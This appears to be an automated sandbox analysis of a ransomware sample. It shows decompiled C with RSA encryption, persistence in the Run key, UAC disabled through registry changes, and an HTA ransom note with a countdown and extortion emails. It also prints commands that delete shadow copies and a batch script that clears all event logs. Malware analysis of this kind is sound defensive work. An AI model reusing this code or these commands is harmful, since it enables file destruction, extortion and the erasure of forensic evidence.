							_t186 = 0x4040e0;
							do {
								_v48 = 0xf4;
								asm("cld");
								memcpy(_t186, _t197, 0xf4);
								_t201 = _t201 + 0xc;
								_push(0x500);
								_push( &_v48);
								_push(_t186);
								_push(0);
								_push(0);
								_push(0);
								_push( *0x403abb); // executed
								L00401F7A(); // executed
								_t186 = _t197 + 0x1f4;
								_t39 =  &_v56;
								 *_t39 = _v56 - 1;
							} while ( *_t39 != 0);
							_v48 = 0xc4;
							asm("cld");
							memcpy(_t186, _t197, 0xc4);
							_t201 = _t201 + 0xc;
							_push(0x500);
							_push( &_v48);
							_push(_t186);
							_push(0);
							_push(1);
							_push(0);
							_push( *0x403abb); // executed
							L00401F7A(); // executed
							CryptDestroyKey( *0x403abb); // executed
							CryptReleaseContext(_v44, "true");
							RegSetValueExA(_v36, "orsa", 0, 3, 0x4045e0, 0x114);
							RegSetValueExA(_v36, "rsa", 0, 3, 0x4040e0, 0x500);
							goto L16;
						}
					} else {
						L16:
						RegCloseKey(_v36);
						_push(0x8000);
						_push(_v40);
						L00401EF6();
						RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", 0, 0xf013f,  &_v36); // executed
						RegSetValueExA(_v36, "PromptOnSecureDesktop", 0, 4, _v40, 4);
						RegSetValueExA(_v36, "EnableLUA", 0, 4, _v40, 4);
						RegSetValueExA(_v36, "ConsentPromptBehaviorAdmin", 0, 4, _v40, 4);
						RegCloseKey(_v36);
						CryptAcquireContextA( &_v44, 0, 0, 1, 0xf0000000); // executed
						CryptImportKey(_v44, 0x4045e0, 0x114, 0, 0, "@�l");
						_t191 =  &M004035B5;
						_v56 = _t191;
						_v56 = _v56 - 5;
						_push(4);
						asm("lodsd");
						asm("bswap edx");
						asm("xlatb");
						asm("stosb");
						asm("rol edx, 0x6");
						asm("loop 0xfffffff5");
						asm("loop 0xffffffe6");
						 *((char*)(_t191 - 1)) = 0x33;
						GetSystemTimeAsFileTime( &_v28);
						_v28.dwHighDateTime = _v28.dwHighDateTime + 0x258;
						FileTimeToSystemTime( &_v28,  &_v20);
						GetDateFormatA(0, 0,  &_v20, "dd,MM,yyyy",  &M00403449, 0xa);
						 *0x403ab3 = lstrlenA("<html><head><hta:application id=1\r\nshowInTaskBar=no\r\ncaption=no\r\nborder=none\r\ninnerBorder=no\r\nscroll=no\r\ncontextmenu=no\r\nwindowstate=maximize />\r\n<script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!=\'undefined\'?Y:now.getFullYear();Z=Z?Z-1:now.getMonth();D=typeof(D)!=\'undefined\'?D:now.getDate();H=typeof(H)!=\'undefined\'?H:now.getHours();M=typeof(M)!=\'undefined\'?M:now.getMinutes();var endDate=new Date(Y,Z,D,H,M,s+1);var i=setInterval(function(){var t=endDate.getTime()-now.getTime();if(t<0){clearInterval(i);alert(\'Time is up!\');}else{var d=Math.floor(t/864e5);var h=Math.floor(t/36e5)%24;var o=Math.floor(t/6e4)%60;var p=Math.floor(t/1e3)%60;var i=\'<div style=\"width:90px;float:left;text-align:center\"><div style=\"font-size:65px;\">\';var l=\'</div><div>\';var e=\'</div></div><div style=\"float:left;font-size:60px;\">:</div>\';document.getElementById(\'X\').innerHTML=i+d+l+\'Day\'+e+i+h+l+\'Hours\'+e+i+o+l+\'Minutes\'+e+i+p+l+\'Seconds\';if(!p&&!o&&!d&&!h){clearInterval(i);alert(\'Time is up!\');}}now.setSeconds(now.getSeconds()+1);},1000);}C(00,00,12,04,05,2019);</script></head><body style=\'text-align:center;background:#000\'></br></br></br><h2 style=\'font-size:40px;color:#b00\'>You are unlucky! The terrible virus has captured your files! For decoding please contact by email JonStokton@Protonmail.com or JonStokton@tutanota.com</h2></br></br><h1 style=\'color:#FFF\'>Your<h2 style=\'font-size:40px;color:#00F\'> [ID]XE0PGVAVqcuaklH3[ID]</h2></br>1. In the subject line, write your ID.</br>2. Attach 1-2 infected files that do not contain important information (less than 2 mb)</br>are required to generate the decoder and restore the test file.</br>Hurry up! Time is limited!</br>Attention!!!</br>At the end of this time, the private key for generating the decoder will be destroyed. Files will not be restored!</h1></br></br><div id=\'X\' style=\'position:absolute;left:40%;color:#F00\'></div></body></html>");
						MultiByteToWideChar(3, 0, _v56, 0xffffffff, 0x4046f4, 0x19);
						 *0x4046f4 = 0x2e;
						_t192 = _v40;
						asm("cld");
						memcpy(_t192, _v56, 0x19);
						_t195 = _t192;
						 *_t195 = 0x2e;
						lstrcatA(_t195, "\\shell\\open\\command");
						RegCreateKeyA(0x80000000, _t195,  &_v36); // executed
						_t196 =  &(_t195[0x200]);
						lstrcatA(_t196, "C:\\Windows\\System32\\mshta.exe ");
						lstrcatA(_t196, "\"c:\\Decoding help.hta\"");
						RegSetValueExA(_v36, 0x403003, 0, 1, _t196, lstrlenA(_t196));
						RegCloseKey(_v36);
						SHChangeNotify(0x8000000, 0, 0, 0); // executed
						GetEnvironmentVariableA("ComSpec", _v40, 0x5dc); // executed
						ShellExecuteA(0, 0, _v40, "/c vssadmin delete shadows /all", 0, 0); // executed
						GlobalFree(_v40); // executed
						SetErrorMode(1); // executed
						E00401DE7("SeBackupPrivilege", 0); // executed
						E00401DE7("SeRestorePrivilege", 0); // executed
						while(1) {
							E004016FF(); // executed
							while(1) {
								Sleep(0x7530); // executed
								if( *0x403ab7 == 0) {
									break;
								}
							}
							Sleep(0x1388);
							if(_v60 == 0) {
								_v60 = _v60 + 1;
								ShellExecuteA(0, "open", "\"c:\\Decoding help.hta\"", 0, 0, 5);
							}
							_v44 = CreateFileA("C:\\windows\\clerlog.bat", 0xc0000000, 0, 0, 4, 0, 0);
							WriteFile(_v44, "@echo off\r\nfor /F \"tokens=*\" %%G in (\'wevtutil.exe el\') DO (call:r \"%%G\")\r\ngoto End\r\n:r\r\nwevtutil.exe cl %1\r\ngoto :eof\r\n:End\r\nrd /s /q %systemdrive%\\$RECYCLE.BIN\r\ndel %0", 0xaa,  &_v56, 0);
							CloseHandle(_v44);
							ShellExecuteA(0, "open", "C:\\windows\\clerlog.bat", 0, 0, 0);
						}
					}
				}
			}
























    0x004017a8
    0x004017b4
    0x004017b9
    0x004017c4
    0x004017d1
    0x004017d8
    0x004017ef
    0x00401810
    0x00401831
    0x00401839
    0x00401848
    0x00401848
    0x00401862
    0x00401867
    0x0040188a
    0x00000000
    0x00401895
    0x00401895
    0x004018b8
    0x004018c8
    0x004018c8
    0x004018d7
    0x004018dc
    0x004018e0
    0x004018ea
    0x00401923
    0x00000000
    0x00000000
    0x00401931
    0x00000000
    0x00401931
    0x004018f9
    0x0040190e
    0x00401915
    0x00000000
    0x00401915
    0x0040193b
    0x0040193c
    0x00401941
    0x00401943
    0x00401946
    0x0040194b
    0x00401955
    0x00401956
    0x00401959
    0x0040195b
    0x0040195d
    0x0040195f
    0x00401962
    0x00401967
    0x00401971
    0x00401972
    0x00401977
    0x00401979
    0x0040197b
    0x0040197d
    0x00401980
    0x00401988
    0x00401992
    0x004019a6
    0x004019c1
    0x004019c6
    0x004019cd
    0x004019d0
    0x004019d6
    0x004019dd
    0x004019e0
    0x004019e1
    0x004019e1
    0x004019e3
    0x004019eb
    0x004019ec
    0x004019ed
    0x004019ef
    0x004019f1
    0x004019f3
    0x004019f9
    0x004019fe
    0x00401a01
    0x00401a01
    0x00401a01
    0x00401a0d
    0x00401a10
    0x00401a11
    0x00401a11
    0x00401a13
    0x00401a1b
    0x00401a1c
    0x00401a1d
    0x00401a1f
    0x00401a21
    0x00401a23
    0x00401a29
    0x00401a34
    0x00401a3e
    0x00401a59
    0x00401a74
    0x00000000
    0x00401a74
    0x004018c3
    0x00401a79
    0x00401a7c
    0x00401a81
    0x00401a86
    0x00401a89
    0x00401aa3
    0x00401ab9
    0x00401acf
    0x00401ae5
    0x00401aed
    0x00401b01
    0x00401b1c
    0x00401b2d
    0x00401b33
    0x00401b36
    0x00401b3f
    0x00401b40
    0x00401b43
    0x00401b50
    0x00401b51
    0x00401b52
    0x00401b55
    0x00401b59
    0x00401b5b
    0x00401b63
    0x00401b68
    0x00401b77
    0x00401b90
    0x00401b9f
    0x00401bb4
    0x00401bb9
    0x00401bc0
    0x00401bcc
    0x00401bcd
    0x00401bcf
    0x00401bd0
    0x00401bd9
    0x00401be8
    0x00401bed
    0x00401bf9
    0x00401c04
    0x00401c1d
    0x00401c25
    0x00401c35
    0x00401c47
    0x00401c5c
    0x00401c64
    0x00401c6b
    0x00401c77
    0x00401c83
    0x00401c88
    0x00401c88
    0x00401c8d
    0x00401c92
    0x00401c9e
    0x00000000
    0x00000000
    0x00401d26
    0x00401ca9
    0x00401cb2
    0x00401cb4
    0x00401cc9
    0x00401cc9
    0x00401ce7
    0x00401cfd
    0x00401d05
    0x00401d1c
    0x00401d1c
    0x00401c88
    0x004018b8

    APIs
      • Part of subcall function 00401781: GlobalAlloc.KERNEL32(00000040,?,?,004010A6,00008000), ref: 00401789
      • Part of subcall function 00401781: Sleep.KERNEL32(000000C8,00000040,?,?,004010A6,00008000), ref: 00401797
    • GetModuleFileNameA.KERNEL32(00000000,00000000,00008000,00008000), ref: 004017C4
    • lstrcmpiA.KERNEL32(C:\windows\searchfiles.exe,?,00000000,00000000,00008000,00008000), ref: 004017D1
    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run\,00000000,000F013F,?,C:\windows\searchfiles.exe,?,00000000,00000000,00008000,00008000), ref: 004017EF
    • lstrlenA.KERNEL32("c:\Decoding help.hta",80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run\,00000000,000F013F,?,C:\windows\searchfiles.exe,?,00000000,00000000,00008000,00008000), ref: 004017F9
    • RegSetValueExA.ADVAPI32(?,unlock,00000000,00000001,"c:\Decoding help.hta",00000000,"c:\Decoding help.hta",80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run\,00000000,000F013F,?,C:\windows\searchfiles.exe,?,00000000,00000000), ref: 00401810
    • lstrlenA.KERNEL32(C:\windows\searchfiles.exe,?,unlock,00000000,00000001,"c:\Decoding help.hta",00000000,"c:\Decoding help.hta",80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run\,00000000,000F013F,?,C:\windows\searchfiles.exe,?,00000000), ref: 0040181A
    • RegSetValueExA.ADVAPI32(?,searchfiles,00000000,00000001,C:\windows\searchfiles.exe,00000000,C:\windows\searchfiles.exe,?,unlock,00000000,00000001,"c:\Decoding help.hta",00000000,"c:\Decoding help.hta",80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run\), ref: 00401831
    • RegCloseKey.ADVAPI32(?,?,searchfiles,00000000,00000001,C:\windows\searchfiles.exe,00000000,C:\windows\searchfiles.exe,?,unlock,00000000,00000001,"c:\Decoding help.hta",00000000,"c:\Decoding help.hta",80000002), ref: 00401839
    • CopyFileA.KERNEL32(?,C:\windows\searchfiles.exe,00000000), ref: 00401848
    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\DateTime\,00000000,000F013F,?,C:\windows\searchfiles.exe,?,00000000,00000000,00008000,00008000), ref: 00401862
    • RegQueryValueExA.ADVAPI32(?,orsa,00000000,00000000,004045E0,00000114,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\DateTime\,00000000,000F013F,?,C:\windows\searchfiles.exe,?,00000000,00000000,00008000), ref: 00401883
    • RegQueryValueExA.ADVAPI32(?,rsa,00000000,00000000,004040E0,00000500,?,orsa,00000000,00000000,004045E0,00000114,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\DateTime\,00000000,000F013F), ref: 004018B1
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,orsa,00000000,00000000,004045E0,00000114,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\DateTime\,00000000,000F013F,?), ref: 004018D7
    • GetLastError.KERNEL32(?,00000000,00000000,00000001,F0000000,?,orsa,00000000,00000000,004045E0,00000114,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\DateTime\,00000000,000F013F,?), ref: 004018E0
    • GetEnvironmentVariableA.KERNEL32(ComSpec,?,000005DC,?,00000000,00000000,00000001,00000008,?,00000000,00000000,00000001,F0000000,?,orsa,00000000), ref: 004018F9
    • ShellExecuteA.SHELL32(00000000,00000000,?,/c Regsvr32 /s Rsaenh.dll,00000000,00000000), ref: 0040190E
    • Sleep.KERNEL32(00000064,00000000,00000000,?,/c Regsvr32 /s Rsaenh.dll,00000000,00000000,ComSpec,?,000005DC,?,00000000,00000000,00000001,00000008,?), ref: 00401915
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,00000008,?,00000000,00000000,00000001,F0000000,?,orsa,00000000,00000000,004045E0,00000114), ref: 00401931
    • CryptGenKey.ADVAPI32(?,00000001,08000001,?,?,00000000,00000000,00000001,F0000000,?,orsa,00000000,00000000,004045E0,00000114,80000002), ref: 00401946
    • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,00000494,?,00000001,08000001,?,?,00000000,00000000,00000001,F0000000,?), ref: 00401962
    • CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,004045E0,00000114,?,00000000,00000007,00000000,?,00000494,?,00000001,08000001,?), ref: 00401980
    • CryptDestroyKey.ADVAPI32(?,?,00000000,00000006,00000000,004045E0,00000114,?,00000000,00000007,00000000,?,00000494,?,00000001,08000001), ref: 00401988
    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000000,00000006,00000000,004045E0,00000114,?,00000000,00000007,00000000,?,00000494,?), ref: 00401992
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000000,?,?,00000000,00000006,00000000,004045E0,00000114,?,00000000), ref: 004019A6
    • CryptImportKey.ADVAPI32(?,00403FBF,00000114,00000000,00000000,@l,?,00000000,00000000,00000001,F0000000,?,00000000,?,?,00000000), ref: 004019C1
    • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000,00000000,@l,?,00000000,00000000,00000001), ref: 004019F9
    • CryptEncrypt.ADVAPI32(00000000,00000001,00000000,?,00000114,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000), ref: 00401A29
    • CryptDestroyKey.ADVAPI32(00000000,00000001,00000000,?,00000114,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000), ref: 00401A34
    • CryptReleaseContext.ADVAPI32(?,00000000,00000000,00000001,00000000,?,00000114,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF), ref: 00401A3E
    • RegSetValueExA.ADVAPI32(?,orsa,00000000,00000003,004045E0,00000114,?,00000000,00000000,00000001,00000000,?,00000114,00000500,00000000,00000000), ref: 00401A59
    • RegSetValueExA.ADVAPI32(?,rsa,00000000,00000003,004040E0,00000500,?,orsa,00000000,00000003,004045E0,00000114,?,00000000,00000000,00000001), ref: 00401A74
    • RegCloseKey.ADVAPI32(?,?,rsa,00000000,00000003,004040E0,00000500,?,orsa,00000000,00000003,004045E0,00000114,?,00000000,00000000), ref: 00401A7C
    • RtlZeroMemory.KERNEL32(?,00008000,?,?,rsa,00000000,00000003,004040E0,00000500,?,orsa,00000000,00000003,004045E0,00000114,?), ref: 00401A89
    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,000F013F,?,?,00008000,?,?,rsa,00000000,00000003,004040E0,00000500,?,orsa), ref: 00401AA3
    • RegSetValueExA.ADVAPI32(?,PromptOnSecureDesktop,00000000,00000004,?,00000004,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,000F013F,?,?,00008000,?,?,rsa), ref: 00401AB9
    • RegSetValueExA.ADVAPI32(?,EnableLUA,00000000,00000004,?,00000004,?,PromptOnSecureDesktop,00000000,00000004,?,00000004,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,000F013F), ref: 00401ACF
    • RegSetValueExA.ADVAPI32(?,ConsentPromptBehaviorAdmin,00000000,00000004,?,00000004,?,EnableLUA,00000000,00000004,?,00000004,?,PromptOnSecureDesktop,00000000,00000004), ref: 00401AE5
    • RegCloseKey.ADVAPI32(?,?,ConsentPromptBehaviorAdmin,00000000,00000004,?,00000004,?,EnableLUA,00000000,00000004,?,00000004,?,PromptOnSecureDesktop,00000000), ref: 00401AED
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,ConsentPromptBehaviorAdmin,00000000,00000004,?,00000004,?,EnableLUA,00000000,00000004), ref: 00401B01
    • CryptImportKey.ADVAPI32(?,004045E0,00000114,00000000,00000000,@l,?,00000000,00000000,00000001,F0000000,?,?,ConsentPromptBehaviorAdmin,00000000,00000004), ref: 00401B1C
    Strings
    • /c Regsvr32 /s Rsaenh.dll, xrefs: 00401902
    • SeBackupPrivilege, xrefs: 00401C72
    • \shell\open\command, xrefs: 00401BD3
    • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-open, xrefs: 00401B27
    • SOFTWARE\Microsoft\Windows\CurrentVersion\Run\, xrefs: 004017E5
    • ConsentPromptBehaviorAdmin, xrefs: 00401ADD
    • XE0PGVAVqcuaklH3[ID]</h2></br>1. In the subject line, write your ID.</br>2. Attach 1-2 infected files that do not contain important information (less than 2 mb)</br>are required to generate the decoder and restore the test file.</br>Hurry up! Time is limited!<, xrefs: 00401B2D
    • unlock, xrefs: 00401808
    • C:\windows\clerlog.bat, xrefs: 00401CDD, 00401D10
    • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\, xrefs: 00401A99
    • PromptOnSecureDesktop, xrefs: 00401AB1
    • SOFTWARE\Microsoft\Windows\CurrentVersion\DateTime\, xrefs: 00401858
    • SeRestorePrivilege, xrefs: 00401C7E
    • C:\windows\searchfiles.exe, xrefs: 004017CC, 00401815, 00401820, 00401840
    • C:\Windows\System32\mshta.exe , xrefs: 00401BF3
    • @echo offfor /F "tokens=*" %%G in ('wevtutil.exe el') DO (call:r "%%G")goto End:rwevtutil.exe cl %1goto :eof:Endrd /s /q %systemdrive%\$RECYCLE.BINdel %0, xrefs: 00401CF5
    • EnableLUA, xrefs: 00401AC7
    • ComSpec, xrefs: 004018F4, 00401C42
    • dd,MM,yyyy, xrefs: 00401B83
    • "c:\Decoding help.hta", xrefs: 004017F4, 004017FF, 00401BFE, 00401CBD
    • /c vssadmin delete shadows /all, xrefs: 00401C50
    • orsa, xrefs: 0040187B, 00401A51
    • searchfiles, xrefs: 00401829
    • @l, xrefs: 004019AB, 00401B06
    • 04,05,2019);</script></head><body style='text-align:center;background:#000'></br></br></br><h2 style='font-size:40px;color:#b00'>You are unlucky! The terrible virus has captured your files! For decoding please contact by email JonStokton@Protonmail.com or JonS, xrefs: 00401B7E
    • <html><head><hta:application id=1showInTaskBar=nocaption=noborder=noneinnerBorder=noscroll=nocontextmenu=nowindowstate=maximize /><script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!='undefined, xrefs: 00401B95
    Memory Dump Source
    • Source File: 00000000.00000001.593332961.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.593319076.0000000000400000.00000002.sdmp Download File
    • Associated: 00000000.00000001.593340737.0000000000402000.00000002.sdmp Download File
    • Associated: 00000000.00000001.593354738.0000000000403000.00000008.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_module.jbxd
    Similarity
    • API ID: Crypt$Value$Context$Acquire$CloseOpen$DestroyEncryptExportFileImportQueryReleaseSleeplstrlen$AllocCopyEnvironmentErrorExecuteGlobalLastMemoryModuleNameShellVariableZerolstrcmpi
    • String ID: "c:\Decoding help.hta"$/c Regsvr32 /s Rsaenh.dll$/c vssadmin delete shadows /all$04,05,2019);</script></head><body style='text-align:center;background:#000'></br></br></br><h2 style='font-size:40px;color:#b00'>You are unlucky! The terrible virus has captured your files! For decoding please contact by email JonStokton@Protonmail.com or JonS$<html><head><hta:application id=1showInTaskBar=nocaption=noborder=noneinnerBorder=noscroll=nocontextmenu=nowindowstate=maximize /><script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!='undefined$@echo offfor /F "tokens=*" %%G in ('wevtutil.exe el') DO (call:r "%%G")goto End:rwevtutil.exe cl %1goto :eof:Endrd /s /q %systemdrive%\$RECYCLE.BINdel %0$@l$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-open$C:\Windows\System32\mshta.exe $C:\windows\clerlog.bat$C:\windows\searchfiles.exe$ComSpec$ConsentPromptBehaviorAdmin$EnableLUA$PromptOnSecureDesktop$SOFTWARE\Microsoft\Windows\CurrentVersion\DateTime\$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\$SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$SeBackupPrivilege$SeRestorePrivilege$XE0PGVAVqcuaklH3[ID]</h2></br>1. In the subject line, write your ID.</br>2. Attach 1-2 infected files that do not contain important information (less than 2 mb)</br>are required to generate the decoder and restore the test file.</br>Hurry up! Time is limited!<$\shell\open\command$dd,MM,yyyy$orsa$searchfiles$unlock
    • API String ID: 502290952-998760635
    • Opcode ID: 067f5b85d839d909d261e6f5ecec44bc9520b5d9e95da1cec580265f3e11e12d
    • Instruction ID: 86879c33b08c28671aa86a1e658d7eba573c44414e10c71c68188b85a97574e0
    • Opcode Fuzzy Hash: 067f5b85d839d909d261e6f5ecec44bc9520b5d9e95da1cec580265f3e11e12d
    • Instruction Fuzzy Hash: 60D1C071B943097AEB21AA91CC43FDE7A79AB04B09F20413AF700790E1D7FD6A14966D
    Uniqueness

    Uniqueness Score: -1,00%

    Function 0040191C, Relevance: 115.8, APIs: 46, Strings: 20, Instructions: 298encryptionregistrystringCOMMON
    Download Yara Rule
    C-Code - Quality: 55%
    			E0040191C() {
				void* _t138;
				long _t143;
				void* _t144;
				char* _t147;
				CHAR* _t148;
				void* _t149;
				void* _t153;
				void* _t154;

				_push(_t153 - 0x1c);
				_push(0x8000001);
				_push(1);
				_push( *(_t153 - 0x28));
				L00401F86(); // executed
				 *(_t153 - 0x2c) = 0x494;
				_push(_t153 - 0x2c);
				_push( *(_t153 - 0x24));
				_push(0);
				_push(7);
				_push(0);
				_push( *(_t153 - 0x1c));
				L00401F80(); // executed
				 *(_t153 - 0x2c) = 0x114;
				_push(_t153 - 0x2c);
				_push(0x4045e0);
				_push(0);
				_push(6);
				_push(0);
				_push( *(_t153 - 0x1c));
				L00401F80();
				CryptDestroyKey( *(_t153 - 0x1c));
				CryptReleaseContext( *(_t153 - 0x28), 0);
				CryptAcquireContextA(_t153 - 0x28, 0, 0, 1, 0xf0000000); // executed
				CryptImportKey( *(_t153 - 0x28), 0x403fbf, 0x114, 0, 0, "@�l");
				 *(_t153 - 0x34) = 4;
				_t149 =  *(_t153 - 0x24);
				_t138 = 0x4040e0;
				do {
					 *(_t153 - 0x2c) = 0xf4;
					asm("cld");
					memcpy(_t138, _t149, 0xf4);
					_t154 = _t154 + 0xc;
					_push(0x500);
					_push(_t153 - 0x2c);
					_push(_t138);
					_push(0);
					_push(0);
					_push(0);
					_push( *0x403abb); // executed
					L00401F7A(); // executed
					_t138 = _t149 + 0x1f4;
					_t18 = _t153 - 0x34;
					 *_t18 =  *(_t153 - 0x34) - 1;
				} while ( *_t18 != 0);
				 *(_t153 - 0x2c) = 0xc4;
				asm("cld");
				memcpy(_t138, _t149, 0xc4);
				_push(0x500);
				_push(_t153 - 0x2c);
				_push(_t138);
				_push(0);
				_push(1);
				_push(0);
				_push( *0x403abb); // executed
				L00401F7A(); // executed
				CryptDestroyKey( *0x403abb); // executed
				CryptReleaseContext( *(_t153 - 0x28), "true");
				RegSetValueExA( *(_t153 - 0x20), "orsa", 0, 3, 0x4045e0, 0x114);
				RegSetValueExA( *(_t153 - 0x20), "rsa", 0, 3, 0x4040e0, 0x500);
				RegCloseKey( *(_t153 - 0x20));
				_push(0x8000);
				_push( *(_t153 - 0x24));
				L00401EF6();
				RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", 0, 0xf013f, _t153 - 0x20); // executed
				RegSetValueExA( *(_t153 - 0x20), "PromptOnSecureDesktop", 0, 4,  *(_t153 - 0x24), 4);
				RegSetValueExA( *(_t153 - 0x20), "EnableLUA", 0, 4,  *(_t153 - 0x24), 4);
				RegSetValueExA( *(_t153 - 0x20), "ConsentPromptBehaviorAdmin", 0, 4,  *(_t153 - 0x24), 4);
				RegCloseKey( *(_t153 - 0x20));
				CryptAcquireContextA(_t153 - 0x28, 0, 0, 1, 0xf0000000); // executed
				CryptImportKey( *(_t153 - 0x28), 0x4045e0, 0x114, 0, 0, "@�l");
				_t143 =  &M004035B5;
				 *(_t153 - 0x34) = _t143;
				 *(_t153 - 0x34) =  *(_t153 - 0x34) - 5;
				_push(4);
				asm("lodsd");
				asm("bswap edx");
				asm("xlatb");
				asm("stosb");
				asm("rol edx, 0x6");
				asm("loop 0xfffffff5");
				asm("loop 0xffffffe6");
				 *((char*)(_t143 - 1)) = 0x33;
				GetSystemTimeAsFileTime(_t153 - 0x18);
				 *((intOrPtr*)(_t153 - 0x14)) =  *((intOrPtr*)(_t153 - 0x14)) + 0x258;
				FileTimeToSystemTime(_t153 - 0x18, _t153 - 0x10);
				GetDateFormatA(0, 0, _t153 - 0x10, "dd,MM,yyyy",  &M00403449, 0xa);
				 *0x403ab3 = lstrlenA("<html><head><hta:application id=1\r\nshowInTaskBar=no\r\ncaption=no\r\nborder=none\r\ninnerBorder=no\r\nscroll=no\r\ncontextmenu=no\r\nwindowstate=maximize />\r\n<script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!=\'undefined\'?Y:now.getFullYear();Z=Z?Z-1:now.getMonth();D=typeof(D)!=\'undefined\'?D:now.getDate();H=typeof(H)!=\'undefined\'?H:now.getHours();M=typeof(M)!=\'undefined\'?M:now.getMinutes();var endDate=new Date(Y,Z,D,H,M,s+1);var i=setInterval(function(){var t=endDate.getTime()-now.getTime();if(t<0){clearInterval(i);alert(\'Time is up!\');}else{var d=Math.floor(t/864e5);var h=Math.floor(t/36e5)%24;var o=Math.floor(t/6e4)%60;var p=Math.floor(t/1e3)%60;var i=\'<div style=\"width:90px;float:left;text-align:center\"><div style=\"font-size:65px;\">\';var l=\'</div><div>\';var e=\'</div></div><div style=\"float:left;font-size:60px;\">:</div>\';document.getElementById(\'X\').innerHTML=i+d+l+\'Day\'+e+i+h+l+\'Hours\'+e+i+o+l+\'Minutes\'+e+i+p+l+\'Seconds\';if(!p&&!o&&!d&&!h){clearInterval(i);alert(\'Time is up!\');}}now.setSeconds(now.getSeconds()+1);},1000);}C(00,00,12,04,05,2019);</script></head><body style=\'text-align:center;background:#000\'></br></br></br><h2 style=\'font-size:40px;color:#b00\'>You are unlucky! The terrible virus has captured your files! For decoding please contact by email JonStokton@Protonmail.com or JonStokton@tutanota.com</h2></br></br><h1 style=\'color:#FFF\'>Your<h2 style=\'font-size:40px;color:#00F\'> [ID]XE0PGVAVqcuaklH3[ID]</h2></br>1. In the subject line, write your ID.</br>2. Attach 1-2 infected files that do not contain important information (less than 2 mb)</br>are required to generate the decoder and restore the test file.</br>Hurry up! Time is limited!</br>Attention!!!</br>At the end of this time, the private key for generating the decoder will be destroyed. Files will not be restored!</h1></br></br><div id=\'X\' style=\'position:absolute;left:40%;color:#F00\'></div></body></html>");
				MultiByteToWideChar(3, 0,  *(_t153 - 0x34), 0xffffffff, 0x4046f4, 0x19);
				 *0x4046f4 = 0x2e;
				_t144 =  *(_t153 - 0x24);
				asm("cld");
				memcpy(_t144,  *(_t153 - 0x34), 0x19);
				_t147 = _t144;
				 *_t147 = 0x2e;
				lstrcatA(_t147, "\\shell\\open\\command");
				RegCreateKeyA(0x80000000, _t147, _t153 - 0x20); // executed
				_t148 =  &(_t147[0x200]);
				lstrcatA(_t148, "C:\\Windows\\System32\\mshta.exe ");
				lstrcatA(_t148, "\"c:\\Decoding help.hta\"");
				RegSetValueExA( *(_t153 - 0x20), 0x403003, 0, 1, _t148, lstrlenA(_t148));
				RegCloseKey( *(_t153 - 0x20));
				SHChangeNotify(0x8000000, 0, 0, 0); // executed
				GetEnvironmentVariableA("ComSpec",  *(_t153 - 0x24), 0x5dc); // executed
				ShellExecuteA(0, 0,  *(_t153 - 0x24), "/c vssadmin delete shadows /all", 0, 0); // executed
				GlobalFree( *(_t153 - 0x24)); // executed
				SetErrorMode(1); // executed
				E00401DE7("SeBackupPrivilege", 0); // executed
				E00401DE7("SeRestorePrivilege", 0); // executed
				while(1) {
					E004016FF(); // executed
					while(1) {
						Sleep(0x7530); // executed
						if( *0x403ab7 == 0) {
							break;
						}
					}
					Sleep(0x1388);
					if( *((intOrPtr*)(_t153 - 0x38)) == 0) {
						 *((intOrPtr*)(_t153 - 0x38)) =  *((intOrPtr*)(_t153 - 0x38)) + 1;
						ShellExecuteA(0, "open", "\"c:\\Decoding help.hta\"", 0, 0, 5);
					}
					 *(_t153 - 0x28) = CreateFileA("C:\\windows\\clerlog.bat", 0xc0000000, 0, 0, 4, 0, 0);
